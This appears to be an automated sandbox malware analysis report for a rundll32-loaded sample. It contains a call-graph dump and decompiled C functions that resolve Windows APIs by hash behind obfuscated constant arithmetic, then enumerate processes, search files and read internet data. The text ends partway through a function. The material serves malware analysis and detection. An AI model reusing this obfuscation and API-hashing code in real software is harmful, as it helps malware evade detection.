4ed377a 4909->4911 4912 4ed376a 4909->4912 4913 4ee38ca 7 API calls 4909->4913 5012 4ee98bd 4909->5012 5020 4ef0687 4909->5020 4911->4117 5008 4eddfd3 4912->5008 4913->4909 4920 4ef2220 4916->4920 4918 4ef24b4 4919 4eecaa8 2 API calls 4918->4919 4921 4ef24e1 4919->4921 4920->4918 4922 4eed617 GetPEB 4920->4922 4924 4eea566 FindCloseChangeNotification GetPEB 4920->4924 4927 4ee3fae GetPEB 4920->4927 4930 4ed4af2 GetPEB 4920->4930 4932 4ef24b2 4920->4932 4933 4ed3f5c 2 API calls 4920->4933 4934 4edab99 GetPEB 4920->4934 4935 4ef0352 2 API calls 4920->4935 5037 4eee867 4920->5037 5040 4ef01ed 4920->5040 5044 4ef25c3 4920->5044 5051 4eda048 4920->5051 5059 4eddaae 4920->5059 4925 4eea566 2 API calls 4921->4925 4921->4932 4922->4920 4924->4920 4928 4ef24ff 4925->4928 4927->4920 4929 4eea566 2 API calls 4928->4929 4929->4932 4930->4920 4932->4117 4933->4920 4934->4920 4935->4920 4943 4edc4c4 4937->4943 4938 4eecaa8 2 API calls 4938->4943 4939 4edc5f4 4939->4117 4940 4eed617 GetPEB 4940->4943 4941 4ee3fae GetPEB 4941->4943 4942 4ef01ed GetPEB 4942->4943 4943->4938 4943->4939 4943->4940 4943->4941 4943->4942 4944 4ed3f5c 2 API calls 4943->4944 4945 4edab99 GetPEB 4943->4945 4946 4ef0352 2 API calls 4943->4946 4947 4ef25c3 3 API calls 4943->4947 4944->4943 4945->4943 4946->4943 4947->4943 4949 4ed3490 4948->4949 4950 4ed34f6 4949->4950 4951 4ed2043 2 API calls 4949->4951 4952 4ef18d2 GetPEB 4949->4952 4953 4eddfd3 GetPEB 4949->4953 4954 4eea566 2 API calls 4949->4954 4950->4117 4951->4949 4952->4949 4953->4949 4954->4949 4965 4ed919a 4955->4965 4956 4ed3035 GetPEB 4956->4965 4957 4eed617 GetPEB 4957->4965 4958 4ed9379 4958->4117 4959 4ee3fae GetPEB 4959->4965 4960 4ef01ed GetPEB 4960->4965 4961 4ef0352 RtlFreeHeap GetPEB 4961->4965 4962 4ed3f5c RtlAllocateHeap GetPEB 4962->4965 4963 4eecaa8 2 API calls 4963->4965 4964 4edab99 GetPEB 4964->4965 4965->4956 4965->4957 4965->4958 4965->4959 4965->4960 4965->4961 4965->4962 4965->4963 4965->4964 4966 4ef25c3 3 API calls 
4965->4966 4966->4965 4974 4ee1e5f 4967->4974 4968 4ee98bd GetPEB 4968->4974 4969 4ee1ea0 4969->4117 4970 4ee1e90 4972 4eddfd3 GetPEB 4970->4972 4971 4ee38ca 7 API calls 4971->4974 4972->4969 4973 4ef0687 GetPEB 4973->4974 4974->4968 4974->4969 4974->4970 4974->4971 4974->4973 4985 4eeb931 4975->4985 4976 4ed3035 GetPEB 4976->4985 4977 4eed617 GetPEB 4977->4985 4978 4eebb0d 4978->4117 4979 4ee3fae GetPEB 4979->4985 4980 4edab99 GetPEB 4980->4985 4981 4ef01ed GetPEB 4981->4985 4982 4ef0352 RtlFreeHeap GetPEB 4982->4985 4983 4ed3f5c RtlAllocateHeap GetPEB 4983->4985 4984 4eecaa8 2 API calls 4984->4985 4985->4976 4985->4977 4985->4978 4985->4979 4985->4980 4985->4981 4985->4982 4985->4983 4985->4984 4986 4ef25c3 3 API calls 4985->4986 4986->4985 5093 4ef10f0 4987->5093 4989 4ee2a46 4990 4ed3035 GetPEB 4989->4990 4992 4ed2043 RtlFreeHeap GetPEB 4989->4992 4993 4ed2654 2 API calls 4989->4993 4994 4eed617 GetPEB 4989->4994 4995 4ee2e17 4989->4995 4996 4ee2e15 4989->4996 4997 4eef6d3 GetPEB 4989->4997 4998 4ee3fae GetPEB 4989->4998 5000 4eecaa8 2 API calls 4989->5000 5001 4ee0387 GetPEB 4989->5001 5003 4ef01ed GetPEB 4989->5003 5004 4ef0352 RtlFreeHeap GetPEB 4989->5004 5005 4ed3f5c RtlAllocateHeap GetPEB 4989->5005 5006 4edab99 GetPEB 4989->5006 5007 4ef25c3 3 API calls 4989->5007 5096 4edea72 4989->5096 5100 4ed7283 4989->5100 4990->4989 4992->4989 4993->4989 4994->4989 4999 4eea566 2 API calls 4995->4999 4996->4117 4997->4989 4998->4989 4999->4996 5000->4989 5001->4989 5003->4989 5004->4989 5005->4989 5006->4989 5007->4989 5009 4eddfe3 5008->5009 5025 4edfcc9 5009->5025 5013 4ee98d4 5012->5013 5014 4ee9b60 5013->5014 5029 4ed68df 5013->5029 5014->4909 5017 4ed1ed4 GetPEB 5018 4ee9b17 5017->5018 5018->5014 5019 4ed1ed4 GetPEB 5018->5019 5019->5018 5021 4ef069b 5020->5021 5022 4ef07ed 5021->5022 5023 4ee9d10 GetPEB 5021->5023 5033 4ee7e0b 5021->5033 5022->4909 5023->5021 5026 4edfce8 5025->5026 5027 4ed2309 GetPEB 5026->5027 5028 4ede09b 5027->5028 5028->4911 5030 
4ed68fd 5029->5030 5031 4ed2309 GetPEB 5030->5031 5032 4ed6990 5031->5032 5032->5014 5032->5017 5034 4ee7e2a 5033->5034 5035 4ed2309 GetPEB 5034->5035 5036 4ee7ec4 5035->5036 5036->5021 5038 4ed2309 GetPEB 5037->5038 5039 4eee905 5038->5039 5039->4920 5041 4ef0204 5040->5041 5042 4ed419a GetPEB 5041->5042 5043 4ef029e 5042->5043 5043->4920 5048 4ef25dd 5044->5048 5046 4ef2850 5047 4eea566 2 API calls 5046->5047 5049 4ef284e 5047->5049 5048->5046 5048->5049 5050 4ee199d 2 API calls 5048->5050 5069 4eed551 5048->5069 5049->4920 5050->5048 5054 4eda06d 5051->5054 5052 4eee867 GetPEB 5052->5054 5054->5052 5055 4eda2da 5054->5055 5057 4eda2d8 5054->5057 5073 4ef0104 5054->5073 5077 4eefc5c 5054->5077 5058 4eea566 2 API calls 5055->5058 5057->4920 5058->5057 5060 4eddaed 5059->5060 5061 4eddeb0 5060->5061 5062 4ed5a31 GetPEB 5060->5062 5063 4edde94 5060->5063 5065 4ed3f5c 2 API calls 5060->5065 5068 4ef0352 2 API calls 5060->5068 5085 4eeff53 5060->5085 5089 4ed2f36 5060->5089 5061->4920 5061->5061 5062->5060 5081 4eecfb7 5063->5081 5065->5060 5068->5060 5070 4eed578 5069->5070 5071 4ed2309 GetPEB 5070->5071 5072 4eed601 5071->5072 5072->5048 5074 4ef012a 5073->5074 5075 4ed2309 GetPEB 5074->5075 5076 4ef01d3 5075->5076 5076->5054 5078 4eefc78 5077->5078 5079 4ed2309 GetPEB 5078->5079 5080 4eefd02 5079->5080 5080->5054 5082 4eecfcd 5081->5082 5083 4ed2309 GetPEB 5082->5083 5084 4eed085 5083->5084 5084->5061 5086 4eeff70 5085->5086 5087 4ed2309 GetPEB 5086->5087 5088 4ef001b 5087->5088 5088->5060 5090 4ed2f75 5089->5090 5091 4ed2309 GetPEB 5090->5091 5092 4ed3012 5091->5092 5092->5060 5094 4ed2309 GetPEB 5093->5094 5095 4ef118a 5094->5095 5095->4989 5097 4edeaa3 5096->5097 5098 4ed2309 GetPEB 5097->5098 5099 4edeb25 5098->5099 5099->4989 5105 4ed72a9 5100->5105 5101 4edf38a 2 API calls 5101->5105 5102 4ed755d 5102->4989 5103 4ed755f 5104 4eebb18 GetPEB 5103->5104 5104->5102 5105->5101 5105->5102 5105->5103 5107 4eecd19 5106->5107 5108 4ed2309 GetPEB 5107->5108 5109 
4eecdda 5108->5109 5109->4129 5117 4ee90e0 5110->5117 5113 4ed2043 2 API calls 5113->5117 5114 4edf38a RtlAllocateHeap GetPEB 5114->5117 5115 4ef343c GetPEB 5115->5117 5116 4eea1d9 GetPEB 5116->5117 5117->5113 5117->5114 5117->5115 5117->5116 5118 4ee9891 5117->5118 5119 4ee98a4 5117->5119 5122 4ed419a GetPEB 5117->5122 5123 4ee9c25 5117->5123 5127 4ed887a 5117->5127 5131 4eede17 5117->5131 5120 4ed2043 2 API calls 5118->5120 5119->4129 5120->5119 5122->5117 5124 4ee9c5f 5123->5124 5125 4ed2309 GetPEB 5124->5125 5126 4ee9cf1 5125->5126 5126->5117 5128 4ed8896 5127->5128 5129 4ed2309 GetPEB 5128->5129 5130 4ed8923 5129->5130 5130->5117 5132 4eede42 5131->5132 5133 4ed2309 GetPEB 5132->5133 5134 4eededd 5133->5134 5134->5117 5136 4ee73dc 5135->5136 5137 4ed2309 GetPEB 5136->5137 5138 4ed4bd3 5137->5138 5138->3937 5140 4eee927 5139->5140 5141 4ed2309 GetPEB 5140->5141 5142 4eee9da 5141->5142 5142->4176 5144 4ed69c6 5143->5144 5145 4ed2309 GetPEB 5144->5145 5146 4ed6a62 5145->5146 5146->4176 5149 4ed52ae 5147->5149 5148 4ed3f5c 2 API calls 5148->5149 5149->5148 5151 4eeceb9 GetPEB 5149->5151 5152 4ed53d4 5149->5152 5154 4ed53d2 5149->5154 5155 4ef0352 2 API calls 5149->5155 5160 4ee0490 5149->5160 5151->5149 5153 4ee3d6e GetPEB 5152->5153 5153->5154 5154->4176 5155->5149 5157 4eeeb5c 5156->5157 5158 4ed2309 GetPEB 5157->5158 5159 4eeec0d 5158->5159 5159->4166 5161 4ee04a9 5160->5161 5162 4ed2309 GetPEB 5161->5162 5163 4ee055b 5162->5163 5163->5149 5203 4ed3c91 5204 4ee3fae GetPEB 5203->5204 5205 4ed3ed7 5204->5205 5206 4ee17cb 2 API calls 5205->5206 5207 4ed3eeb 5206->5207 5208 4ed3f5c 2 API calls 5207->5208 5215 4ed3f4e 5207->5215 5209 4ed3f06 5208->5209 5210 4edab99 GetPEB 5209->5210 5211 4ed3f27 5210->5211 5212 4ef0352 2 API calls 5211->5212 5213 4ed3f36 5212->5213 5214 4eef790 GetPEB 5213->5214 5214->5215 5164 4ee43b3 5165 4ee4473 5164->5165 5169 4ee449e 5164->5169 5170 4ed441e 5165->5170 5168 4ed4248 GetPEB 5168->5169 5179 4ed48e6 5170->5179 5171 4ed5a31 GetPEB 
5171->5179 5172 4ef1988 GetPEB 5172->5179 5173 4ed4ac5 5175 4eecaa8 2 API calls 5173->5175 5174 4ed4ac3 5174->5168 5174->5169 5175->5174 5176 4ed3035 GetPEB 5176->5179 5177 4ed3f5c RtlAllocateHeap GetPEB 5177->5179 5178 4eed617 GetPEB 5178->5179 5179->5171 5179->5172 5179->5173 5179->5174 5179->5176 5179->5177 5179->5178 5180 4ee17cb 2 API calls 5179->5180 5181 4edab99 GetPEB 5179->5181 5182 4ef0352 RtlFreeHeap GetPEB 5179->5182 5180->5179 5181->5179 5182->5179 5216 4eefd10 5217 4eefe4b 5216->5217 5218 4eefe91 5217->5218 5219 4ed5923 2 API calls 5217->5219 5220 4eefe65 5219->5220 5224 4eebd84 5220->5224 5223 4ef0352 2 API calls 5223->5218 5225 4eebd9f 5224->5225 5226 4eebe97 5225->5226 5228 4ef2869 5225->5228 5226->5223 5229 4ef2882 5228->5229 5230 4ed2309 GetPEB 5229->5230 5231 4ef291c 5230->5231 5231->5225 5183 4ed5ab2 5197 4ed5ae1 5183->5197 5184 4ee3b54 GetPEB 5184->5197 5185 4ed2043 2 API calls 5185->5197 5186 4ef002c GetPEB 5186->5197 5187 4ed67a3 5191 4ed2153 GetPEB 5187->5191 5188 4ed3f5c RtlAllocateHeap GetPEB 5188->5197 5189 4ee3802 GetPEB 5189->5197 5190 4ed68da 5190->5190 5193 4ed67cb 5191->5193 5192 4ee18c8 GetPEB 5192->5197 5194 4ee54fd GetPEB 5194->5197 5195 4ee55bd GetPEB 5195->5197 5196 4edf38a 2 API calls 5196->5197 5197->5184 5197->5185 5197->5186 5197->5187 5197->5188 5197->5189 5197->5190 5197->5192 5197->5194 5197->5195 5197->5196 5198 4ef0352 RtlFreeHeap GetPEB 5197->5198 5198->5197

                                                                                                        Executed Functions

                                                                                                        C-Code - Quality: 67%
                                                                                                        			E04EE1A80(void* __ecx, struct _WIN32_FIND_DATAW* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, WCHAR* _a16) {
                                                                                                        				unsigned int _v8;
                                                                                                        				signed int _v12;
                                                                                                        				signed int _v16;
                                                                                                        				signed int _v20;
                                                                                                        				void* _v32;
                                                                                                        				intOrPtr _v36;
                                                                                                        				void* _t44;
                                                                                                        				void* _t55;
                                                                                                        				signed int _t57;
                                                                                                        				struct _WIN32_FIND_DATAW* _t63;
                                                                                                        
                                                                                                        				_push(_a16);
                                                                                                        				_t63 = __edx;
                                                                                                        				_push(_a12);
                                                                                                        				_push(_a8);
                                                                                                        				_push(_a4);
                                                                                                        				_push(__edx);
                                                                                                        				E04EF2523(_t44);
                                                                                                        				_v36 = 0x40784c;
                                                                                                        				asm("stosd");
                                                                                                        				asm("stosd");
                                                                                                        				_t57 = 0x66;
                                                                                                        				asm("stosd");
                                                                                                        				_v8 = 0xc58147;
                                                                                                        				_v8 = _v8 / _t57;
                                                                                                        				_v8 = _v8 >> 6;
                                                                                                        				_v8 = _v8 + 0xffff0e61;
                                                                                                        				_v8 = _v8 ^ 0xffff2899;
                                                                                                        				_v16 = 0x3eee0f;
                                                                                                        				_v16 = _v16 ^ 0xf4098113;
                                                                                                        				_v16 = _v16 * 0x76;
                                                                                                        				_v16 = _v16 ^ 0x918df00d;
                                                                                                        				_v12 = 0x61adbd;
                                                                                                        				_v12 = _v12 | 0x1ce5c3f2;
                                                                                                        				_v12 = _v12 ^ 0x5ce6c57a;
                                                                                                        				_v12 = _v12 ^ 0x400dc737;
                                                                                                        				_v20 = 0x919b51;
                                                                                                        				_v20 = _v20 + 0x9c69;
                                                                                                        				_v20 = _v20 ^ 0x00927a19;
                                                                                                        				E04ED2309(0x352, _t57, _t57, 0x810611c3, _t57, 0x9c9047d0);
                                                                                                        				_t55 = FindFirstFileW(_a16, _t63); // executed
                                                                                                        				return _t55;
                                                                                                        			}














                                                                                                        APIs
                                                                                                        • FindFirstFileW.KERNEL32(04EDCC4B,?,?,?,?,?,?,?,?,?,?,09AB8BF6,00000072), ref: 04EE1B4C
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.1232050333.0000000004ED1000.00000020.00000001.sdmp, Offset: 04ED0000, based on PE: true
                                                                                                        • Associated: 00000007.00000002.1232044390.0000000004ED0000.00000004.00000001.sdmp
                                                                                                        • Associated: 00000007.00000002.1232069361.0000000004EF5000.00000004.00000001.sdmp
                                                                                                        • Associated: 00000007.00000002.1232075435.0000000004EF7000.00000002.00000001.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_7_2_4ed0000_rundll32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: FileFindFirst
                                                                                                        • String ID: Lx@
                                                                                                        • API String ID: 1974802433-402333656
                                                                                                        • Opcode ID: 36fdb602463615d85640dee2202416375b56d64be84a9f72e6469216861f4ee0
                                                                                                        • Instruction ID: c93e56aed74b6fa4aaecc6c3fab19bc3639218cf63abdd801755cd69e0f58b05
                                                                                                        • Opcode Fuzzy Hash: 36fdb602463615d85640dee2202416375b56d64be84a9f72e6469216861f4ee0
                                                                                                        • Instruction Fuzzy Hash: 14214375D00209EBEB18CFA9DC4A8DEBFB4FB84304F008188E911A6260D3B59B54DFA1
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 69%
                                                                                                        			E04EF1027(void* __ecx, void* __edx, intOrPtr _a4, void* _a8, long _a12, intOrPtr _a16, intOrPtr _a20, DWORD* _a24) {
                                                                                                        				signed int _v8;
                                                                                                        				unsigned int _v12;
                                                                                                        				signed int _v16;
                                                                                                        				signed int _v20;
                                                                                                        				void* _t46;
                                                                                                        				int _t55;
                                                                                                        				signed int _t57;
                                                                                                        				void* _t62;
                                                                                                        
                                                                                                        				_push(_a24);
                                                                                                        				_t62 = __ecx;
                                                                                                        				_push(_a20);
                                                                                                        				_push(_a16);
                                                                                                        				_push(_a12);
                                                                                                        				_push(_a8);
                                                                                                        				_push(_a4);
                                                                                                        				_push(__ecx);
                                                                                                        				E04EF2523(_t46);
                                                                                                        				_v12 = 0xd4e775;
                                                                                                        				_v12 = _v12 ^ 0x9fa1d679;
                                                                                                        				_v12 = _v12 + 0xffffd43b;
                                                                                                        				_v12 = _v12 >> 0xf;
                                                                                                        				_v12 = _v12 ^ 0x000b9d33;
                                                                                                        				_v20 = 0xb1fd06;
                                                                                                        				_v20 = _v20 + 0xffff1766;
                                                                                                        				_v20 = _v20 ^ 0x00bd550d;
                                                                                                        				_v16 = 0x2d7499;
                                                                                                        				_v16 = _v16 << 0x10;
                                                                                                        				_v16 = _v16 ^ 0x749af706;
                                                                                                        				_v8 = 0x5dfa4b;
                                                                                                        				_t57 = 0x11;
                                                                                                        				_v8 = _v8 / _t57;
                                                                                                        				_v8 = _v8 >> 0x10;
                                                                                                        				_v8 = _v8 | 0xef9b7d02;
                                                                                                        				_v8 = _v8 ^ 0xef9457ed;
                                                                                                        				E04ED2309(0x254, _t57, _t57, 0xf677e454, _t57, 0xc0cf1a4);
                                                                                                        				_t55 = InternetReadFile(_t62, _a8, _a12, _a24); // executed
                                                                                                        				return _t55;
                                                                                                        			}












                                                                                                        APIs
                                                                                                        • InternetReadFile.WININET(?,749AF706,00BD550D,?), ref: 04EF10E9
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.1232050333.0000000004ED1000.00000020.00000001.sdmp, Offset: 04ED0000, based on PE: true
                                                                                                        • Associated: 00000007.00000002.1232044390.0000000004ED0000.00000004.00000001.sdmp
                                                                                                        • Associated: 00000007.00000002.1232069361.0000000004EF5000.00000004.00000001.sdmp
                                                                                                        • Associated: 00000007.00000002.1232075435.0000000004EF7000.00000002.00000001.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_7_2_4ed0000_rundll32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: FileInternetRead
                                                                                                        • String ID:
                                                                                                        • API String ID: 778332206-0
                                                                                                        • Opcode ID: 2d4f4d84a63d0f13ac273aada7b35ede13ebed0102486743890e3910fc006acb
                                                                                                        • Instruction ID: a5dc448cfcb4e56c00d917782c4e01c826b36200d5a3918a22c8cbb2fa0879d8
                                                                                                        • Opcode Fuzzy Hash: 2d4f4d84a63d0f13ac273aada7b35ede13ebed0102486743890e3910fc006acb
                                                                                                        • Instruction Fuzzy Hash: 5D2113B6D00209BBDF06DFE4C94A8EEBBB1EF44304F108189F92566251E3B55B61EB91
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 100%
                                                                                                        			E04EE1B54(int _a4) {
                                                                                                        				signed int _v8;
                                                                                                        				signed int _v12;
                                                                                                        				signed int _v16;
                                                                                                        				signed int _v20;
                                                                                                        				signed int _v24;
                                                                                                        				intOrPtr _v28;
                                                                                                        				intOrPtr _v32;
                                                                                                        				intOrPtr _v36;
                                                                                                        				void* _t51;
                                                                                                        				signed int _t52;
                                                                                                        
                                                                                                        				_v24 = _v24 & 0x00000000;
                                                                                                        				_v36 = 0x604094;
                                                                                                        				_v32 = 0x94e455;
                                                                                                        				_v28 = 0xad6ab3;
                                                                                                        				_v8 = 0x1f2344;
                                                                                                        				_v8 = _v8 >> 0xc;
                                                                                                        				_v8 = _v8 << 0xe;
                                                                                                        				_t52 = 0x3c;
                                                                                                        				_v8 = _v8 * 0x16;
                                                                                                        				_v8 = _v8 ^ 0x0ab2d5aa;
                                                                                                        				_v20 = 0xb8d8f1;
                                                                                                        				_v20 = _v20 ^ 0x9bb5e2ea;
                                                                                                        				_v20 = _v20 ^ 0x9b0a37ea;
                                                                                                        				_v16 = 0x527695;
                                                                                                        				_v16 = _v16 << 1;
                                                                                                        				_v16 = _v16 / _t52;
                                                                                                        				_v16 = _v16 ^ 0x000d80fe;
                                                                                                        				_v12 = 0xedaf67;
                                                                                                        				_v12 = _v12 ^ 0xb485e6d8;
                                                                                                        				_v12 = _v12 + 0xffff9be0;
                                                                                                        				_v12 = _v12 ^ 0xb46ea43d;
                                                                                                        				E04ED2309(0x190, _t52, _t52, 0xbde7009f, _t52, 0x9c9047d0);
                                                                                                        				_t51 = CreateToolhelp32Snapshot(_a4, 0); // executed
                                                                                                        				return _t51;
                                                                                                        			}














                                                                                                        APIs
                                                                                                        • CreateToolhelp32Snapshot.KERNEL32(B46EA43D,00000000), ref: 04EE1C0A
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.1232050333.0000000004ED1000.00000020.00000001.sdmp, Offset: 04ED0000, based on PE: true
                                                                                                        • Associated: 00000007.00000002.1232044390.0000000004ED0000.00000004.00000001.sdmp
                                                                                                        • Associated: 00000007.00000002.1232069361.0000000004EF5000.00000004.00000001.sdmp
                                                                                                        • Associated: 00000007.00000002.1232075435.0000000004EF7000.00000002.00000001.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_7_2_4ed0000_rundll32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CreateSnapshotToolhelp32
                                                                                                        • String ID:
                                                                                                        • API String ID: 3332741929-0
                                                                                                        • Opcode ID: 8dbd4dee2a96a2a279b30488413906bed3e520bcc45b322a8894c97035d3b5c6
                                                                                                        • Instruction ID: 7aef1b73c233a7ecbcead2076d00ee6a66e917f7f878314bd170cc5f9443df23
                                                                                                        • Opcode Fuzzy Hash: 8dbd4dee2a96a2a279b30488413906bed3e520bcc45b322a8894c97035d3b5c6
                                                                                                        • Instruction Fuzzy Hash: 7811F3B1D0520CEBDB18DFA8C94A5AEBBB0FF44304F108199E521B72A0D7B56B04DF51
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Control-flow Graph

                                                                                                        control_flow_graph 561 4ed54da-4ed55ae call 4ef2523 call 4ed2309 InternetCloseHandle
                                                                                                        C-Code - Quality: 87%
                                                                                                        			E04ED54DA(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, void* _a12) {
                                                                                                        				signed int _v8;
                                                                                                        				signed int _v12;
                                                                                                        				signed int _v16;
                                                                                                        				signed int _v20;
                                                                                                        				signed int _v24;
                                                                                                        				intOrPtr _v28;
                                                                                                        				void* _t52;
                                                                                                        				int _t63;
                                                                                                        				signed int _t65;
                                                                                                        				signed int _t66;
                                                                                                        
                                                                                                        				_push(_a12);
                                                                                                        				_push(_a8);
                                                                                                        				_push(_a4);
                                                                                                        				E04EF2523(_t52);
                                                                                                        				_v24 = _v24 & 0x00000000;
                                                                                                        				_v28 = 0x6eade3;
                                                                                                        				_v20 = 0x70ee4c;
                                                                                                        				_v20 = _v20 + 0xffffd19f;
                                                                                                        				_v20 = _v20 ^ 0x007528c6;
                                                                                                        				_v16 = 0x80bb49;
                                                                                                        				_v16 = _v16 + 0xffff2cb2;
                                                                                                        				_v16 = _v16 >> 4;
                                                                                                        				_t65 = 0x3d;
                                                                                                        				_v16 = _v16 / _t65;
                                                                                                        				_v16 = _v16 ^ 0x000cd3d3;
                                                                                                        				_v12 = 0x49bca9;
                                                                                                        				_v12 = _v12 + 0x284b;
                                                                                                        				_v12 = _v12 + 0x352d;
                                                                                                        				_v12 = _v12 ^ 0x5aa1db04;
                                                                                                        				_v12 = _v12 ^ 0x5aee1bd2;
                                                                                                        				_v8 = 0xbb5f19;
                                                                                                        				_v8 = _v8 << 9;
                                                                                                        				_v8 = _v8 | 0x616a7bee;
                                                                                                        				_t39 =  &_v8; // 0x616a7bee
                                                                                                        				_t66 = 0x5f;
                                                                                                        				_v8 =  *_t39 / _t66;
                                                                                                        				_v8 = _v8 ^ 0x01468cd5;
                                                                                                        				E04ED2309(_t66 + 0x22, _t66, _t66, 0x1d483158, _t66, 0xc0cf1a4);
                                                                                                        				_t63 = InternetCloseHandle(_a12); // executed
                                                                                                        				return _t63;
                                                                                                        			}














                                                                                                        APIs
                                                                                                        • InternetCloseHandle.WININET(007528C6), ref: 04ED55A9
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.1232050333.0000000004ED1000.00000020.00000001.sdmp, Offset: 04ED0000, based on PE: true
                                                                                                        • Associated: 00000007.00000002.1232044390.0000000004ED0000.00000004.00000001.sdmp
                                                                                                        • Associated: 00000007.00000002.1232069361.0000000004EF5000.00000004.00000001.sdmp
                                                                                                        • Associated: 00000007.00000002.1232075435.0000000004EF7000.00000002.00000001.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_7_2_4ed0000_rundll32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CloseHandleInternet
                                                                                                        • String ID: -5$Lp${ja
                                                                                                        • API String ID: 1081599783-1222928185
                                                                                                        • Opcode ID: 96c25ca98efac3a213f8ce2c5c378593396d62ac674d19cb573e17f5676fb90f
                                                                                                        • Instruction ID: 3e64b870e5b6b5d2149e4e43436efd803f39b424004a704553f184bb96059c54
                                                                                                        • Opcode Fuzzy Hash: 96c25ca98efac3a213f8ce2c5c378593396d62ac674d19cb573e17f5676fb90f
                                                                                                        • Instruction Fuzzy Hash: 342104B6D0120DEBEF04DFE5C94A9AEBBB1FB10318F108199E520A6250E3B95B14CF91
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Control-flow Graph

                                                                                                        control_flow_graph 566 4eef606-4eef6d2 call 4ef2523 call 4ed2309 Process32FirstW
                                                                                                        C-Code - Quality: 82%
                                                                                                        			E04EEF606(void* __ecx, void* __edx, struct tagPROCESSENTRY32W* _a4, intOrPtr _a8) {
                                                                                                        				signed int _v8;
                                                                                                        				signed int _v12;
                                                                                                        				signed int _v16;
                                                                                                        				signed int _v20;
                                                                                                        				signed int _v24;
                                                                                                        				signed int _v28;
                                                                                                        				intOrPtr _v32;
                                                                                                        				void* _t43;
                                                                                                        				void* _t50;
                                                                                                        				void* _t54;
                                                                                                        
                                                                                                        				_push(_a8);
                                                                                                        				_t54 = __edx;
                                                                                                        				_push(_a4);
                                                                                                        				_push(__edx);
                                                                                                        				_push(__ecx);
                                                                                                        				E04EF2523(_t43);
                                                                                                        				_v28 = _v28 & 0x00000000;
                                                                                                        				_v24 = _v24 & 0x00000000;
                                                                                                        				_v32 = 0xf33a94;
                                                                                                        				_v8 = 0x16e1c5;
                                                                                                        				_v8 = _v8 << 0x10;
                                                                                                        				_v8 = _v8 + 0xffff7501;
                                                                                                        				_v8 = _v8 * 0x3d;
                                                                                                        				_v8 = _v8 ^ 0xcbc2f299;
                                                                                                        				_v20 = 0x18380a;
                                                                                                        				_v20 = _v20 + 0x556a;
                                                                                                        				_v20 = _v20 ^ 0x2e444359;
                                                                                                        				_v20 = _v20 ^ 0x2e5734c8;
                                                                                                        				_v16 = 0x1de0f;
                                                                                                        				_v16 = _v16 + 0xffff3d0f;
                                                                                                        				_v16 = _v16 ^ 0x5b4c4104;
                                                                                                        				_v16 = _v16 ^ 0x5b45396c;
                                                                                                        				_v12 = 0x8d2c67;
                                                                                                        				_v12 = _v12 | 0x6bb36e73;
                                                                                                        				_v12 = _v12 ^ 0x44de99d4;
                                                                                                        				_v12 = _v12 ^ 0x2f6e43e4;
                                                                                                        				_t50 = E04ED2309(0x343, __ecx, __ecx, 0x1a63a552, __ecx, 0x9c9047d0);
                                                                                                        				Process32FirstW(_t54, _a4); // executed
                                                                                                        				return _t50;
                                                                                                        			}














                                                                                                        APIs
                                                                                                        • Process32FirstW.KERNEL32(00000000,2F6E43E4,?,?,?,?,?,?,?,?,00000000), ref: 04EEF6CC
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.1232050333.0000000004ED1000.00000020.00000001.sdmp, Offset: 04ED0000, based on PE: true
                                                                                                        • Associated: 00000007.00000002.1232044390.0000000004ED0000.00000004.00000001.sdmp
                                                                                                        • Associated: 00000007.00000002.1232069361.0000000004EF5000.00000004.00000001.sdmp
                                                                                                        • Associated: 00000007.00000002.1232075435.0000000004EF7000.00000002.00000001.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_7_2_4ed0000_rundll32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: FirstProcess32
                                                                                                        • String ID: YCD.$l9E[$Cn/
                                                                                                        • API String ID: 2623510744-4191728293
                                                                                                        • Opcode ID: ba6908419aca7e40de5752100cf2159fdf1c013576c21fa5a45c6b552e88f8aa
                                                                                                        • Instruction ID: 5105093ff7696a187f2d750dd7c855609ba2d18b720298e1cbb5bafcacac4bc1
                                                                                                        • Opcode Fuzzy Hash: ba6908419aca7e40de5752100cf2159fdf1c013576c21fa5a45c6b552e88f8aa
                                                                                                        • Instruction Fuzzy Hash: 422153B6C01209EBCF08DFE4D9499AEBBB4FF10715F108289E515B6210D3741B00DF91
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 55%
                                                                                                        			E04EEA809(DWORD* __ecx, void* __edx, intOrPtr _a12, WCHAR* _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a40, intOrPtr _a44) {
                                                                                                        				signed int _v8;
                                                                                                        				signed int _v12;
                                                                                                        				signed int _v16;
                                                                                                        				signed int _v20;
                                                                                                        				WCHAR* _v24;
                                                                                                        				WCHAR* _v28;
                                                                                                        				intOrPtr _v32;
                                                                                                        				intOrPtr _v36;
                                                                                                        				void* _t45;
                                                                                                        				int _t55;
                                                                                                        				DWORD* _t60;
                                                                                                        
                                                                                                        				_t60 = __ecx;
                                                                                                        				_push(0);
